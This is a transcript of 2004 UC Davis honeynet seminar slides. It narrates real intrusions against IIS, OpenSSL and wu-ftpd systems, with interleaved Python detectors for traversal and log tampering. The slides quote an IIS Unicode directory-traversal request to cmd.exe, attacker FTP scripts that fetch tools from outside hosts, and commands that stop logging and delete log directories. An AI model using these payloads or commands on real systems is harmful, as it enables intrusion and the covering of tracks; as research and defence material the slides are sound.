UCDPromia Honeynet Project UC Davis Security Lab Seminar April 28, 2004 Adam Carlson email: ajcarlso - PowerPoint PPT Presentation

1
UCD/Promia Honeynet Project
UC Davis Security Lab Seminar
April 28, 2004
Adam Carlson
email: ajcarlson AT ucdavis.edu
2
What is a honeypot/honeynet?
  • No widely accepted definition
  • Lance Spitzner defines a honeypot as "... an
    information system resource whose value lies in
    unauthorized or illicit use of that resource." [1]
  • A honeynet is a type of honeypot designed for
    research.
    1) A honeynet is a network of multiple systems
    2) All of the systems are real
  [1] http://www.governmentsecurity.org/articles/HoneypotsDefinitionsandValueofHoneypots.php

3
Why is a honeynet useful?
  • Not meant to be used
  • Less traffic to inspect
  • No privacy issues
  • Can simulate more complex network
  • Proactive rather than reactive
  • Tests incident response

4
Promia/UCD honeynet overview
  • Currently 4 honeynet machines
    • HP-1 Red Hat 9.0 Workstation Install
    • HP-2 Red Hat 7.2 Server Install
    • HP-3 Windows 2000 Server
    • HP-4 Windows NT Server
  • ...Connected via a sensor (HP-Sensor) running Red Hat 9.0

5
Configuration Specifics
  • HP-1 Red Hat 9.0
    • Configuration
      • Workstation install
    • Services
      • SSH
      • Syslog
      • FTP
  • HP-2 Red Hat 7.2
    • Configuration
      • Server install
    • Services
      • SSH
      • Telnet
      • Apache
      • mySQL
      • BIND
      • FTP

6
  • HP-3 Windows 2000 Server
    • Configuration
      • Default install with Service Pack 1
    • Services
      • IIS 5.0 Webserver
      • IIS FTP Server
      • WinVNC Virtual Network Computing server
  • HP-4 Windows NT Server
    • Configuration
      • Default install with Service Pack 4
    • Services
      • IIS 3.0 Webserver
      • IIS FTP Server
      • WinVNC Virtual Network Computing server

7
Data Capture Methods
  • Windows
    • Comlog command line logging utility
    • Evtsys Event Log to Syslog utility
    • IIS logs
    • Tcpdump traffic
    • New Sebek for Windows

8
  • Linux
    • Sebek Kernel Module
    • Remote syslog server
    • Tcpdump traffic
    • Tripwire

9
  • Sensor Configuration
    • Red Hat 9.0
    • Snort 2.0 with the Snort-inline patch
    • ACID (Analysis Console for Intrusion Databases) with mySQL
    • Bridge-utils for ethernet bridging
    • OpenSSH

10
Initial Results
  • Brought online on June 19, 2003
  • 3 initial honeypot machines began receiving
    probes within 40 minutes of being online
  • Suffered chronic worm infestation which resulted
    in 300-400 megabyte tcpdump files
  • Patched against worms and created a fast and easy
    method for restoring computers

11
What took you so long?
  • First attack came on June 21 at 3:39 pm, about 76
    hours after the honeynet was brought online.
  • Directed at Windows NT IIS web server using
    directory traversal URL.
  • Uploaded privilege escalation tool named
    ErunAs2X.exe, remote shell tool nc.exe, and
    Firedaemon.exe
  • Worm infestation forced us to take down system
    and reinstall the OS.

12
  • Next attack was on July 3, 2003
  • Directed at vulnerability in Windows 2000
    WebDAV(Web-based Distributed Authoring and
    Versioning) component of the IIS Web server
  • The intruders set up a rogue ftp server listening
    on port 2687 and used it to upload software and
    music files.
  • Attempted to make changes to Windows that we have
    been unable to explain

13
Why is this intruder trying to update our system
at 12:26 am?
  ...
  dr-x------ 1 root root 258048 Jul 5 00:39 NtServicePackUninstall
  dr-x------ 1 root root   4096 Jul 5 00:38 Installer
  -r-------- 1 root root    607 Jul 5 00:26 Q815021.log
  -r-------- 1 root root   1518 Jul 5 00:21 OEWABLog.txt
  dr-x------ 1 root root   4096 Jul 2 20:37 Debug
  ...
  Q815021.log:
  Service Pack started with following command line:
  CheckSystem: ServicePack version Mismatch
  DoInstallation: CheckSystem Failed
  0xf076: Setup has detected that the version of the Service Pack
  installed on your system is lower than what is necessary to apply
  this hotfix. At minimum, you must have Service Pack 2 installed.
  Message displayed to the user: Setup has detected that the version
  of the Service Pack installed on your system is lower than what is
  necessary to apply this hotfix. At minimum, you must have Service
  Pack 2 installed.
  User Input: OK

14
  • Sometime on July 5th the system crashed and was
    unable to boot back into a functioning state.
  • System taken offline and restored but we did not
    correctly diagnose the attack vector
  • Attackers able to compromise system only 3 hours
    after it is brought back online
  • Again set up FTP server and uploaded software and
    music files
  • Continued to compromise and use the machine until
    August 26th, when the WebDAV vulnerability was
    patched against.

15
Who doesn't love anonymous ftp with write
privileges?
  • Anonymous connection made to Windows NT FTP
    server on July 5th at 2:15 am
  • Checks for write permission, then uploads a file
    named 1mbtest.ptf
  • Removed anonymous write permissions before
    attacker could return

16
Thanks Unicode!
  • On July 19th at 11:17 pm our Windows NT server
    became the target of the next attack.
  • The IIS server running on the honeynet machine
    was vulnerable to a directory traversal attack
    using the Unicode encoding system
  • GET /scripts/..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
  • The attacker lists the contents of all drives,
    then creates an ftp script file:
      open xxx.235.254.67
      steve
      jackson
      binary
      get lsass.exe
      get serv-u.ini
      get command.exe
      get kill.exe
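The request on this slide only works because IIS decoded the path a second time after its traversal check. As an added example (not code from the talk), the detector below normalizes request paths the same way and flags the double-encoded traversal shown here and the Unicode-encoded variant reused on slide 28; the W3C log lines it scans are constructed samples, not honeynet data.

```python
"""Flag double-encoded / Unicode directory traversal in IIS W3C log lines.
Added example; the sample log lines below are constructed, not honeynet data."""
import re
from urllib.parse import unquote

# Constructed W3C extended log lines:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2003-07-19 23:17:02 10.0.0.5 GET /scripts/..%255c..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2003-07-19 23:17:10 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2003-07-19 23:18:00 10.0.0.9 GET /default.htm - 200
2003-07-19 23:18:30 10.0.0.9 GET /images/logo%20small.gif - 200
"""

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

def normalize_path(raw: str, rounds: int = 3) -> str:
    """Percent-decode until the path stops changing (at most `rounds` times),
    then fold the overlong UTF-8 forms and backslashes into '/'.
    IIS 4/5 decoded the path a second time after its security check,
    which is why '%255c' (-> '%5c' -> backslash) slipped past it."""
    path = raw
    for _ in range(rounds):
        decoded = unquote(path, encoding="latin-1", errors="replace")
        if decoded == path:
            break
        path = decoded
    # Overlong UTF-8 encodings of '/' and '\' that the Unicode bug accepted.
    path = path.replace("\xc0\xaf", "/").replace("\xc1\x9c", "\\")
    return path.replace("\\", "/")

def is_traversal(raw_uri: str) -> bool:
    """True when the decoded path climbs with '..' or reaches cmd.exe."""
    path = normalize_path(raw_uri)
    return bool(TRAVERSAL.search(path)) or path.lower().endswith("cmd.exe")

def scan_iis_log(text: str) -> list:
    """Return (client_ip, decoded_path) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or line.startswith("#"):
            continue
        client, uri_stem = fields[2], fields[4]
        if is_traversal(uri_stem):
            hits.append((client, normalize_path(uri_stem)))
    return hits

if __name__ == "__main__":
    for client, path in scan_iis_log(SAMPLE_LOG):
        print(f"{client}  {path}")
```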

17
  • FTP server did not accept username/password
  • Eventually able to get a remote shell on port 99
    using uploaded nc.exe
  • Attacker then downloads p.exe, httpodbc.dll,
    svchost.exe and serv-u.ini
  • Starts Serv-U FTP daemon listening on port 1020
    using svchost.exe and serv-u.ini
  • Uploads more tools via FTP before looking around
    filesystem
  • Discovers hidden directory with our honeypot
    forensics tools
  • Downloads all of the tools and then disconnects

18
  • Came back briefly 2 times in the next week to
    check the directories they had created
  • 2:20 am on July 29th: upload and install a
    Half-Life Counterstrike game server. Attempt to
    hide directory and install game server as a
    service.
  • At 3:30 am the game server is up and running with
    the title "Super Fast California Server".
    Numerous clients immediately start connecting to
    the server.
  • System taken offline at 5:15 pm

19
HTTPS: more secure, right?
  • Next attack came July 31st and was directed at
    Red Hat Linux 7.2 OpenSSL module used by Apache
    Web Server
  • Began with a TCP connection to port 443
  • Attacker then sent a bad HTTP request to port 80
    resulting in a 400 Bad Request message in
    response
  • A number of connections are made to port 443 that
    contain the exploit targeting the KEY_ARG
    vulnerability found in the installed version of
    OpenSSL
  • Execute a privilege elevation exploit and begin
    downloading root kit tools from a remote FTP
    server
  • Install rk rootkit and hidden SSH server
    listening on port 1212

20
  • Uploaded selena.tgz which contained a fast and
    simple port 443 scanner utility
  • Attempted to scan several class B networks for
    machines with port 443 open.
  • Many connections observed over the next few days
  • Download and install psyBNC IRC place holder
    program
  • System taken offline on August 5th to make image
    of harddrive. Machine would not reboot.

21
And now more fun with IIS
  • Next attack targeted Microsoft IIS Server WebDAV
    SEARCH overflow vulnerability
  • Began with a series of Echo Ping requests being
    sent to target at 11:56 pm on Sept. 8, 2003.
  • This was followed by a SEARCH request that
    exploited a vulnerability in the IIS server
    WebDAV capabilities, resulting in a remote shell
    listening on port 1055
  • Attacker creates an FTP script:
      open xxx.xxx.143.233
      microsoft
      microsoft
      bin
      get "ntoskrnl.exe" c:\winnt\system32\cache\ntoskrnl.exe
      get "settingslol.jpg" c:\winnt\system32\cache\settingslol.jpg
      get "iislog.exe" c:\winnt\system32\cache\iislog.exe
      bye

22
  • ntoskrnl.exe contains Serv-U FTP daemon
  • settingslol.jpg contains Serv-U configuration
    file
  • iislog.exe contains a program that will delete
    IIS Logs and kill processes on a Windows machine
  • Attacker installs FTP server to listen on port
    2687 and uploads more tools AdmDll.dll,
    iislog.exe, nc.exe, and r_server.exe.
  • Creates remote shell using nc.exe listening on
    port 1234
  • Repeatedly attempts to add a new user to system
    but unsuccessful due to password policy.

23
  • They then install the r_server.exe program as a
    service. r_server is the server component of the
    Remote Administrator (RA) utility
    (http//www.radmin.com/download/default.html)
  • Make r_server connection from 12:13 am to 12:24
    am
  • Finally after 15 minutes and over 40
    username/password combinations the attacker gives
    up on attempting to add an account.
  • Instead adds built in IWAM_HP-3 account to the
    administrator group and disconnects.

24
Too bad our hard drives come from the bargain
barn
  • Connection is made to Serv-U FTP server later
    that day at 11:09 am.
  • Attacker immediately goes to his tools directory
    and deletes all of the uploaded files except for
    the FTP server.
  • At 11:13 am a connection is made from a different
    IP address. The attacker uploads and starts an
    FTP script that will download 7 DivX encoded
    movies.
  • After the download starts, the attacker
    disconnects.
  • Unfortunately there was only enough free space
    for one of the movies before the hard drive
    became completely filled.

25
  • The full hard disk degraded performance and the
    system was taken offline at 7:25 pm on September
    9th.
  • The movie files were deleted but the rogue FTP
    server was left installed. The system was put
    back online at 11:00 pm on September 15th.
  • Attackers returned at 11:45 pm on September 16th
    with a connection to the ftp server.
  • The attackers again uploaded a number of tools
    including nc.exe, r_server.exe, and iislog.exe.
  • Two more connections are made at 3:35 am and
    11:22 pm on September 17th
  • Because no new activity was being recorded,
    system was taken offline and patched against the
    WebDAV vulnerability.

26
You can always count on the classics
  • The next attack targeted the wu-ftpd FTP server
    running on the Red Hat 7.2 machine
  • An anonymous connection is made to the FTP
    server. A connection containing an exploit of
    the fb_realpath() off-by-one vulnerability is
    then made.
  • The exploit creates a remote shell and the
    attackers quickly connect
  • The intruders download and install the shkit v4
    rootkit. The rootkit installs trojaned versions
    of ifconfig, ps, ls, netstat, find, top, lsof,
    slocate, dir, md5sum, syslogd, pstree and login.
    Also installs a covert SSH daemon listening on
    port 10.
  • Attackers connect to the hidden SSH daemon and
    download the SucKIT v1.3b kernel-based rootkit
    and the psyBNC IRC bouncer program.

27
  • Over the next two days the psyBNC IRC program is
    used heavily, but little other activity is
    observed.
  • Decision was made to take the system offline
    because it looked as if it was going to be used
    for file distribution.

28
Saving the best for last
  • Last intrusion began at 11:45 pm on January 18th
  • Directed at Windows NT MSADC component of IIS
  • Attack began with a series of HTTP GET requests,
    attempting a directory traversal using the
    UNICODE encoding scheme (similar to earlier
    attack).
  • Attacker then did a port scan of ports 1-3000
  • Connects to anonymous FTP server and lists drive
    contents, then disconnects
  • Attacker spends the next 20 minutes attacking IIS
    attempting to open a command shell
  • At 12:19 am the attacker issued a POST request to
    the MSADC component of the IIS web server. The
    POST was successful alerting the attacker that
    the MSADC component was installed.

29
  • Attacker exploited MSADC vulnerability and at
    1:15 am issued a command that copied the password
    file C:\winnt\repair\sam._ to the public web
    server directory, where it was then downloaded.
  • The attacker then set up a rogue ftp server on
    port 1020 and a remote shell on port 99.
  • Connected to the rogue ftp server, and uploaded a
    file named httpdodbc.dll. This was really the
    iiscrack exploit written by digitaloffense.net.
  • At 1:45 am the attacker used MSADC to create a
    text file with a list of all files on the system,
    which was then downloaded.

30
  • At 1:47 am the attacker used MSADC to copy the
    original version of cmd.exe, named cm_.exe, to
    the IIS web directory.
  • Then uploaded two programs, winamp and mIRC, as
    well as a third file meant to test the target
    computer's bandwidth.
  • At 3:29 am on January 19th, almost four hours
    after the attack began, the intruder closed all
    connections, leaving only the rogue ftp server
    running.
  • A new connection was made at 5:51 pm that same
    day. The intruder immediately used the ftp
    server to re-open the command shell on port 99.
  • The attacker then uploaded a few more tools
    before attempting to launch a Denial of Service
    attack at 6:07 pm

31
  • After a few unsuccessful attempts, the attacker
    launched the DoS, generating over 2.14 gigabytes
    of fragmented IP packets in under 3 minutes. This
    attack continued until 9:50 pm.
  • An attacker returned at 2:03 am to the rogue ftp
    server and uploaded more files, including the
    Half-Life game server that we had seen in a
    previous intrusion.
  • The attackers also entered the C:\winnt\help\tutor
    directory, which was used to keep the ComLog
    cmd.exe shell logs. They deleted only the log
    files that had recorded their actions.
  • The attacker then installed the Half-Life server,
    rebooted the machine, and disconnected at 2:48
    am.
  • The next connection was made at 12:29 am on
    January 22nd. An intruder connected to the rogue
    ftp server and uploaded a number of mp3 music
    files to the IIS web server directory.

32
  • Between January 23rd and January 25th a number of
    successful requests for the mp3 files were made
    from an array of IP addresses
  • Little other activity is recorded until January
    28th when another connection was made and another
    Denial of Service attack was launched using the
    mIRC program.
  • Decision was made to take the system offline
    January 29th.

33
Conclusions
  • Yes, we will be attacked: 357,233 Snort alerts and
    counting
  • Able to gain tcpdump files containing actual
    exploits
  • Collected real attack tools that are being used
    in the wild.
  • (We received a workable exploit for the windows
    DCOM RPC vulnerability only a few months after
    the vulnerability surfaced)
  • Leads to more questions

34
... why are they trying to install hardware
drivers at 11:30 pm? ...

2003/07/07 21:30:00 284.2
  Munged cmdline: msiinst.exe /delayrebootq
  EXE name: C:\WINNT\System32\msiinst.tmp\msiinst.exe
  The protected system file (C:\WINNT\System32\msi.dll) was successfully unprotected.
  The protected system file (C:\WINNT\System32\msihnd.dll) was successfully unprotected.
  The protected system file (C:\WINNT\System32\msimsg.dll) was successfully unprotected.
  The protected system file (C:\WINNT\System32\msiexec.exe) was successfully unprotected.
2003/07/07 21:35:35 1332.23 Driver Install
  Munged cmdline: C:\WINNT\system32\wzcsetup.exe /i /P
  EXE name: C:\WINNT\system32\wzcsetup.exe
  Searching for hardware ID(s): ms_ndisuio
  Enumerating files C:\WINNT\inf\*.inf
  Found MS_NDISUIO in C:\WINNT\inf\ndisuio.inf
    Device: NDIS Usermode I/O Protocol
    Driver: NDIS Usermode I/O Protocol
    Provider: Microsoft
    Mfg: Microsoft
    Section: Install
  Decorated section name: Install
  Selected driver installs from section Install in c:\winnt\inf\ndisuio.inf.
  Changed class GUID of device to 4D36E975-E325-11CE-BFC1-08002BE10318.
  Set selected driver.
2003/07/07 21:35:50 1332.86 Driver Install
  Searching for hardware ID(s): ms_wzcsvc
  Enumerating files C:\WINNT\inf\*.inf
  Found MS_WZCSVC in C:\WINNT\inf\netwzc.inf
    Device: Wireless Configuration
    Driver: Wireless Configuration
    Provider: Microsoft
    Mfg: Microsoft
    Section: WZCSVC.ndi
  Decorated section name: WZCSVC.ndi
  Selected driver installs from section WZCSVC.ndi in c:\winnt\inf\netwzc.inf.
  Changed class GUID of device to 4D36E974-E325-11CE-BFC1-08002BE10318.
  Set selected driver.
2003/07/07 21:36:00 1484.625 Driver Install
  Munged cmdline: e:\f7861adccd4ae\i386\update\update.exe
  EXE name: e:\f7861adccd4ae\i386\update\update.exe
  Searching for hardware ID(s): acpi\fixedbutton,fixedbutton
  Found ACPI\FixedButton in C:\WINNT\INF\machine.inf
    Device: ACPI Fixed Feature Button
    Driver: ACPI Fixed Feature Button
    Provider: Microsoft
    Mfg: (Standard system devices)
    Section: NO_DRV
  Decorated section name: NO_DRV
35
Which logging mechanisms will they go after?

  TCP  hp-3:ftp   hp-sensor.ucdavis.edu:32822     ESTABLISHED
  TCP  hp-3:http  xxx.w80-8.abo.wanadoo.fr:3938   ESTABLISHED
  TCP  hp-3:http  xxx.cs.ucdavis.edu:16387        ESTABLISHED
  TCP  hp-3:http  xxx.ipt.aol.com:4460            ESTABLISHED
  TCP  hp-3:http  xxx.ipt.aol.com:1825            ESTABLISHED
  TCP  hp-3:http  xxx.prodigy.net.mx:3201         ESTABLISHED
  TCP  hp-3:http  xxx.ppp.tiscali.fr:4931         CLOSE_WAIT
  TCP  hp-3:http  xxx.18.13.191:4598              ESTABLISHED
  TCP  hp-3:http  xxx.18.86.78:4188               ESTABLISHED
  TCP  hp-3:http  xxx.19.25.175:3023              ESTABLISHED
  TCP  hp-3:http  xxx.71.179.160:4550             ESTABLISHED
  TCP  hp-3:1168  hp-4.ucdavis.edu:netbios-ssn    ESTABLISHED

  c:\WINNT\system32\spool\prtprocs\w32x86\prnt  Sun Jul 20 01:16:48 2003  services stop evtsys
  Sun Jul 20 01:16:50 2003  Service evtsys stopped.
  Sun Jul 20 01:16:50 2003
  ...
  c:\WINNT\system32\spool\prtprocs\w32x86\prnt  Sun Jul 20 01:18:25 2003  rmdir c:\winnt\system32\logfiles /q /s
  Sun Jul 20 01:18:25 2003
  Sun Jul 20 01:18:25 2003
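The captured commands above (and the ComLog deletions on slide 31) are the moment the intruder turns on the data capture itself. As an added example, not code from the project, the checker below runs over captured command lines and flags the ones that stop a logging service or wipe a log location; the "<timestamp>: <command>" line format is a constructed simplification of ComLog output, and the sample lines are constructed.

```python
"""Flag captured shell commands aimed at the honeypot's own logging: stopping
evtsys, wiping the IIS log directory, deleting the ComLog logs (slides 31, 35).
Added example; the '<timestamp>: <command>' line format is a constructed
simplification of ComLog output, and the sample lines are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Locations of log data on the honeypots (paths named on slides 31 and 35).
LOG_PATHS = (
    r"\winnt\system32\logfiles",  # IIS logs
    r"\winnt\help\tutor",         # where ComLog kept its cmd.exe logs
)
# Services whose loss blinds the capture; evtsys forwards the Event Log to syslog.
LOG_SERVICES = ("evtsys", "eventlog", "w3svc")

SAMPLE = """\
Sun Jul 20 01:16:48 2003: netstat -an
Sun Jul 20 01:16:48 2003: services stop evtsys
Sun Jul 20 01:17:02 2003: net stop "Windows Management Instrumentation"
Sun Jul 20 01:18:25 2003: rmdir c:\\winnt\\system32\\logfiles /q /s
Sun Jul 20 01:19:01 2003: del c:\\winnt\\help\\tutor\\*.txt
Sun Jul 20 01:19:30 2003: dir c:\\inetpub\\wwwroot
"""

LINE = re.compile(r"^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}): (?P<cmd>.*)$")
DESTRUCTIVE = re.compile(r"^(rmdir|rd|del|erase)\b", re.I)
STOP = re.compile(r"^(net|sc|services)\s+stop\s+(?P<svc>\S+)", re.I)

@dataclass
class Finding:
    ts: str
    cmd: str
    reason: str

def classify(cmd: str) -> Optional[str]:
    """Return why a command is anti-forensic, or None if it looks benign."""
    cmd = cmd.strip()
    stop = STOP.match(cmd)
    if stop and stop.group("svc").strip('"').lower() in LOG_SERVICES:
        return f"stops logging service {stop.group('svc')}"
    if DESTRUCTIVE.match(cmd) and any(p in cmd.lower() for p in LOG_PATHS):
        return "deletes a log directory or log files"
    return None

def scan(text: str) -> List[Finding]:
    """Parse captured command lines and keep those that attack logging."""
    findings = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        reason = classify(m.group("cmd"))
        if reason:
            findings.append(Finding(m.group("ts"), m.group("cmd"), reason))
    return findings
```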
36
Future Work
  • UCD/Promia Honeynet version 2
  • Honeynet goes public
  • More realism: create a fictitious UC Davis group
  • Advertise our presence
  • Develop honeynet tools
  • Honeytokens

37
Thanks!
  • Special thanks to Promia for making this happen
  • Big thanks to Matt Bishop, Tom Ristenpart, and
    Jimmy Zhao for their constant support and help.
  • Monumental thanks to Brennen Reynolds of
    Off-Piste Consulting, who was the original
    designer of this project (and my constant partner
    in crime).